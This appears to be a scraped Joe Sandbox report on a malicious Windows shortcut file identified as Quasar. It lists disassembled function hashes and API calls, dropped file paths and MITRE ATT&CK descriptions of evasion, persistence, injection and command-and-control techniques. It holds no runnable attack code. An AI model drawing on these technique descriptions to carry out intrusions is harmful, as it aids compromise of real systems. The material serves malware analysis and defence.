Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: ErrorLast$abort
String ID:
API String ID: 1447195878-0
Opcode ID: 1529c6d7c540e50c89857ed596667a66517411926ccb20c77aff280936f45278
Instruction ID: 010efbcd7fedbe744814f171345f8469a8f3d21303bfe3ccc1ec502f5ddaaa5e
Opcode Fuzzy Hash: 1529c6d7c540e50c89857ed596667a66517411926ccb20c77aff280936f45278
Instruction Fuzzy Hash: 3C014C20F4934E8AFA5A6BF5A55A67C22B16F44B90F140538E91E87BD6FD3CF8006200

Function 00007FF63D841B40 Relevance: 6.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D792014: ExtCreatePen.GDI32 ref: 00007FF63D7920A3
Part of subcall function 00007FF63D792014: SelectObject.GDI32 ref: 00007FF63D7920B6
Part of subcall function 00007FF63D792014: BeginPath.GDI32 ref: 00007FF63D7920CF
Part of subcall function 00007FF63D792014: SelectObject.GDI32 ref: 00007FF63D7920F6

MoveToEx.GDI32 ref: 00007FF63D841B85
LineTo.GDI32 ref: 00007FF63D841B97
EndPath.GDI32 ref: 00007FF63D841BA9
StrokePath.GDI32 ref: 00007FF63D841BB9

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: dd9fce54b611d67c97b8294591e03b750066cedcfb610561c251c7aac7f23652
Instruction ID: 1aad671255a02bd24700059cae451b4a6ceaaef56721b1fd751b4ff452cb5e6d
Opcode Fuzzy Hash: dd9fce54b611d67c97b8294591e03b750066cedcfb610561c251c7aac7f23652
Instruction Fuzzy Hash: E201B131B1839642E7408F56F8097697B64BB82BD4F180134DF4943BA1EF7DF8448B40

Function 00007FF63D7CD278 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CD2DC

Strings

gfffffff, xrefs: 00007FF63D7CD56A

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: gfffffff
API String ID: 3215553584-1523873471
Opcode ID: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
Instruction ID: 39b3b5748e0f9dabc8a5b184c8795e7b8b4d3e2cba48d4168aae3d8aab1deae5
Opcode Fuzzy Hash: dc31ed7580b08dc4a7b229eebc0aac3b305a5916052008eb2c70828ae2249d51
Instruction Fuzzy Hash: 1F912862F0978E8AEB218F65A1813BC6BA5AB657D0F048131CF8D87795EE3DF512D301

Function 00007FF63D7CD6A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF63D7CD6EB

Strings

gfff, xrefs: 00007FF63D7CD816
e+000, xrefs: 00007FF63D7CD793

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: e+000$gfff
API String ID: 3215553584-3030954782
Opcode ID: 4c1f807f0ab3224dcfbb8f5997088e5ddce98475036b254fe0a7bcd92757e6dc
Instruction ID: 1b5015c32767720c0569768645366d8540f2425d61ee4e248d9115b9e924cf50
Opcode Fuzzy Hash: 4c1f807f0ab3224dcfbb8f5997088e5ddce98475036b254fe0a7bcd92757e6dc
Instruction Fuzzy Hash: AC511662F187C98AE7258F7599413696BA1EB81B90F089231DB9CC7BD5EE3CE045D700

Function 00007FF63D8216B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF63D821752

Strings

AUTOITCALLVARIABLE%d, xrefs: 00007FF63D821742
, $, xrefs: 00007FF63D82178D

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: _snwprintf
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3988819677-2584243854
Opcode ID: 9e61d0783729fcb758f52bd210810c27ffedce1959a5f03c69da23aad27cec03
Instruction ID: 3156fc156642c2dd1b1645af787f439b7de3171af811d4ecb4d3ed21d1558823
Opcode Fuzzy Hash: 9e61d0783729fcb758f52bd210810c27ffedce1959a5f03c69da23aad27cec03
Instruction Fuzzy Hash: 97316DB6B08A4A99EB10DBB5E4411EC23B5FB55788F914032DE0D97759EF38F50AE340

Function 00007FF63D83C638 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF63D7962DC: CreateWindowExW.USER32 ref: 00007FF63D79636C
Part of subcall function 00007FF63D7962DC: GetStockObject.GDI32 ref: 00007FF63D796389
Part of subcall function 00007FF63D7962DC: SendMessageW.USER32 ref: 00007FF63D79639C

SetWindowPos.USER32 ref: 00007FF63D83C72F

Strings

, xrefs: 00007FF63D83C712
SysTabControl32, xrefs: 00007FF63D83C68C

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Window$CreateMessageObjectSendStock
String ID: $SysTabControl32
API String ID: 2080134422-3143400907
Opcode ID: e929506ba38536a5ff1fbe0932e21eb0fa24e69f4ffa421f89c375e430e8e1c5
Instruction ID: 6bbc160bb80bc422dacf8c56a47127c21db255f92dd8bf0ae12570f15fa976d9
Opcode Fuzzy Hash: e929506ba38536a5ff1fbe0932e21eb0fa24e69f4ffa421f89c375e430e8e1c5
Instruction Fuzzy Hash: 16315A726087C58AE760CF55A80479AB7A4F785BB4F144335EAA857BD8DF38E441CF40

Function 00007FF63D8412B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 00007FF63D84133D
CloseHandle.KERNEL32 ref: 00007FF63D84134E

Strings

, xrefs: 00007FF63D841315

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID:
API String ID: 3712363035-3916222277
Opcode ID: 8ea84385d1b2d27026c91107f048c7bf89816de2d280fda4d878613527d23a04
Instruction ID: 29d328d352beac28f4cde5bec0a3574d0a2001303f06531b2ee2124a3014715f
Opcode Fuzzy Hash: 8ea84385d1b2d27026c91107f048c7bf89816de2d280fda4d878613527d23a04
Instruction Fuzzy Hash: A7113032A08B458AE750CFA6F90029BB6B6FB84780F545135DA4D87B65EF3DF054DB00

Function 00007FF63D7B5C28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF63D7B5C31
_CxxThrowException.LIBVCRUNTIME ref: 00007FF63D7B5C42

Part of subcall function 00007FF63D7B7618: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63D7B5C47), ref: 00007FF63D7B768D
Part of subcall function 00007FF63D7B7618: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF63D7B5C47), ref: 00007FF63D7B76BF

Strings

Unknown exception, xrefs: 00007FF63D7B5C4D

Memory Dump Source

Source File: 0000000B.00000002.2950864448.00007FF63D791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF63D790000, based on PE: true

Associated: 0000000B.00000002.2950816762.00007FF63D790000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D846000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951127447.00007FF63D869000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951239477.00007FF63D87B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.2951407364.00007FF63D885000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ff63d790000_winver.jbxd

Similarity

API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
String ID: Unknown exception
API String ID: 3561508498-410509341
Opcode ID: 0c3809f144f3545c1833fb11110d4680ccc998754e884fbd36628457f5f573f6
Instruction ID: 0f8b9fa58733efb1c43844698714089ca6fbb904c7aa17a02e721009f279a95f
Opcode Fuzzy Hash: 0c3809f144f3545c1833fb11110d4680ccc998754e884fbd36628457f5f573f6
Instruction Fuzzy Hash: 77D05B2271498A91DE10DB44D8553D56330F740348F904831D14CC27F1FF3CE606D740

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report alyemenione.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\11653a9b-b505-4648-8b97-06b12a387d86.tmp

Windows Analysis Report
alyemenione.lnk

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre